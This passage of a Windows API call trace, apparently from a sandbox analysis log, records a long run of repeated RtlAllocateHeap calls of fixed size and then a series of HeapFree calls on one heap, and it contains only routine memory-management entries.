0x263c8c0 [0149.375] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x264fad0 [0149.375] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2662ce0 [0149.376] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2675ef0 [0149.376] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2689100 [0149.377] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x269c310 [0149.377] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x26af520 [0149.378] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x26c2730 [0149.378] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x26d5940 [0149.379] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x26e8b50 [0149.379] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x26fbd60 [0149.379] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x270ef70 [0149.380] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2722180 [0149.380] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2735390 [0149.381] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x27485a0 [0149.381] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x275b7b0 [0149.381] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x276e9c0 [0149.382] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2781bd0 [0149.382] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2794de0 [0149.382] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x27a7ff0 [0149.382] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x27bb200 [0149.383] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x27ce410 [0149.383] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x27e1620 [0149.384] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x27f4830 [0149.384] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2807a40 [0149.385] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x281ac50 [0149.385] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x282de60 [0149.385] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2841070 [0149.386] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2854280 [0149.386] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2867490 [0149.386] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x287a6a0 [0149.387] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x288d8b0 [0149.387] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x28a0ac0 [0149.388] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x28b3cd0 [0149.388] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x28c6ee0 [0149.389] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x28da0f0 [0149.389] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x28ed300 [0149.389] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2900510 [0149.390] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x698) returned 0x468910 [0149.390] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47c5f0 | out: hHeap=0x450000) returned 1 [0149.390] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2913720 [0149.391] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2926930 [0149.391] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2939b40 [0149.391] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x294cd50 [0149.391] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x295ff60 [0149.392] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2973170 [0149.392] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2986380 [0149.393] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2999590 [0149.393] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x29ac7a0 [0149.393] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x29bf9b0 [0149.394] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x29d2bc0 [0149.394] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x29e5dd0 [0149.394] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x29f8fe0 [0149.395] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2a0c1f0 [0149.395] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2a1f400 [0149.395] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2a32610 [0149.396] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2a45820 [0149.396] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2a58a30 [0149.397] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2a6bc40 [0149.397] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2a7ee50 [0149.397] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2a92060 [0149.398] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2aa5270 [0149.398] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2ab8480 [0149.592] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2acb690 [0149.592] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2ade8a0 [0149.593] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2af1ab0 [0149.593] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b04cc0 [0149.595] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b17ed0 [0149.595] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b2b0e0 [0149.596] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b3e2f0 [0149.596] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b51500 [0149.597] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b64710 [0149.597] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b77920 [0149.598] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b8ab30 [0149.598] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2b9dd40 [0149.599] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2bb0f50 [0149.599] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2bc4160 [0149.600] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2bd7370 [0149.600] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2bea580 [0149.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2bfd790 [0149.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2c109a0 [0149.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2c23bb0 [0149.602] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2c36dc0 [0149.602] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2c49fd0 [0149.603] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2c5d1e0 [0149.603] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2c703f0 [0149.603] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2c83600 [0149.604] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2c96810 [0149.604] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2ca9a20 [0149.604] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2cbcc30 [0149.604] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2ccfe40 [0149.605] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2ce3050 [0149.605] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2cf6260 [0149.605] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2d09470 [0149.606] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2d1c680 [0149.606] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2d2f890 [0149.607] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2d42aa0 [0149.607] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2d55cb0 [0149.608] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2d68ec0 [0149.608] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2d7c0d0 [0149.608] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2d8f2e0 [0149.609] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2da24f0 [0149.609] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2db5700 [0149.609] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2dc8910 [0149.610] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2df0080 [0149.612] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e03290 [0149.612] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e164a0 [0149.613] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e296b0 [0149.613] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e3c8c0 [0149.614] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e4fad0 [0149.614] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9e0) returned 0x47c5f0 [0149.614] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.614] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e62ce0 [0149.614] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e75ef0 [0149.615] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e89100 [0149.615] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2e9c310 [0149.616] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2eaf520 [0149.616] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2ec2730 [0149.616] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2ed5940 [0149.617] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2ee8b50 [0149.617] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2efbd60 [0149.618] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2f0ef70 [0149.618] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2f22180 [0149.618] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2f35390 [0149.619] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2f485a0 [0149.619] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2f5b7b0 [0149.620] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2f6e9c0 [0149.836] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47c5f0 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x487480 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a7280 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ba490 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4cd6a0 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4e08b0 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4f3ac0 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x506cd0 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x519ee0 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x52d0f0 | out: hHeap=0x450000) returned 1 [0153.975] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1ef0080 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f03290 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f164a0 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f296b0 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f3c8c0 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f4fad0 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f62ce0 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f75ef0 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f89100 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1f9c310 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1faf520 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1fc2730 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x1ff0080 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2003290 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x20164a0 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x20296b0 | out: hHeap=0x450000) returned 1 [0153.976] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x203c8c0 | out: hHeap=0x450000) returned 1 [0153.990] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x204fad0 | out: hHeap=0x450000) returned 1 [0153.991] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2062ce0 | out: hHeap=0x450000) returned 1 [0153.991] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2075ef0 | out: hHeap=0x450000) returned 1 [0153.991] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2089100 | out: hHeap=0x450000) returned 1 [0153.991] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x209c310 | out: hHeap=0x450000) returned 1 [0153.992] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x20af520 | out: hHeap=0x450000) returned 1 [0153.992] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x20c2730 | out: hHeap=0x450000) returned 1 [0153.992] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x20d5940 | out: hHeap=0x450000) returned 1 [0153.992] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x20e8b50 | out: hHeap=0x450000) returned 1 [0153.996] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x20fbd60 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x210ef70 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2122180 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2135390 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x21485a0 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x215b7b0 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x216e9c0 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2181bd0 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2194de0 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x21a7ff0 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x21bb200 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x21ce410 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x21f0080 | out: hHeap=0x450000) returned 1 [0153.997] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2203290 | out: hHeap=0x450000) returned 1 [0154.088] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x22164a0 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x22296b0 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x223c8c0 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x224fad0 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2262ce0 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2275ef0 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2289100 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x229c310 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x22af520 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x22c2730 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x22d5940 | out: hHeap=0x450000) returned 1 [0154.089] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x22e8b50 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x22fbd60 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x230ef70 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2322180 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2335390 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x23485a0 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x235b7b0 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x236e9c0 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2381bd0 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2394de0 | out: hHeap=0x450000) returned 1 [0154.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x23a7ff0 | out: hHeap=0x450000) returned 1 [0154.100] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x23bb200 | out: hHeap=0x450000) returned 1 [0154.102] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x23ce410 | out: hHeap=0x450000) returned 1 [0154.102] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x23e1620 | out: hHeap=0x450000) returned 1 [0154.102] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x23f4830 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2407a40 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x241ac50 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x242de60 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2441070 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2454280 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2467490 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x247a6a0 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x248d8b0 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x24a0ac0 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x24b3cd0 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x24c6ee0 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x24da0f0 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x24ed300 | out: hHeap=0x450000) returned 1 [0154.107] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2500510 | out: hHeap=0x450000) returned 1 [0154.114] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2513720 | out: hHeap=0x450000) returned 1 [0154.114] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2526930 | out: hHeap=0x450000) returned 1 [0154.114] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2539b40 | out: hHeap=0x450000) returned 1 [0154.115] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x254cd50 | out: hHeap=0x450000) returned 1 [0154.115] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x255ff60 | out: hHeap=0x450000) returned 1 [0154.115] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2573170 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2586380 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2599590 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x25ac7a0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x25bf9b0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x25d2bc0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x25f0080 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2603290 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x26164a0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x26296b0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x263c8c0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x264fad0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2662ce0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2675ef0 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2689100 | out: hHeap=0x450000) returned 1 [0154.116] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x269c310 | out: hHeap=0x450000) returned 1 [0154.170] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x26af520 | out: hHeap=0x450000) returned 1 [0154.172] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x26c2730 | out: hHeap=0x450000) returned 1 [0154.172] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x26d5940 | out: hHeap=0x450000) returned 1 [0154.172] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x26e8b50 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x26fbd60 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x270ef70 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2722180 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2735390 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x27485a0 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x275b7b0 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x276e9c0 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2781bd0 | out: hHeap=0x450000) returned 1 [0154.175] HeapFree (in: hHeap=0x450000, 